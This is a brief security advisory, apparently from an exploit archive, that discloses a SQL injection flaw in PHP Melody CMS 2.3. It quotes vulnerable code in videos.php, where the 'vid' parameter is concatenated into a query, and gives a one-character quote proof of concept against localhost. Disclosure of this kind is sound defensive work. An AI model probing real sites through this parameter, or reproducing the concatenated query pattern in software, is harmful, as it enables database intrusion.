PHP Melody CMS 2.3 SQL Injection
Posted on 29 December 2015
================================================================================ # PHP Melody CMS v2.3 SQL injection ================================================================================ # Vendor Homepage: https://www.phpsugar.com # Date: 26/12/2015 # Script Link: https://www.phpsugar.com/blog/2015/04/get-php-melody-v2-3/ # Version : 2.3 # Author: Ashiyane Digital Security Team ================================================================================ #Description : PHP Melody was created by Andrew Rae back in the autumn of 2007 as a simple music videos gallery. During its 8 years of existence, PHP Melody has evolved from this minimalist video gallery into an extended Video CMS. At the present time, PHP Melody is developed entirely by Paul, while Andrew manages the project and provides customer support. # Vulnerable File : videos.php # Vulnerable Code: 56: mysql_query $result = mysql_query($sql); 50: $sql = "SELECT pm_videos.*, pm_videos_urls.mp4, pm_videos_urls.direct FROM pm_videos LEFT JOIN pm_videos_urls ON (pm_videos.uniq_id = pm_videos_urls.uniq_id) WHERE pm_videos.uniq_id = '" . $video_id . "'"; 48: $video_id = secure_sql($_GET['vid']); #Vuln Parameter: vid # PoC : http://localhost/videos.php?vid=1' ================================================================================ # Discovered By : V For Vendetta ================================================================================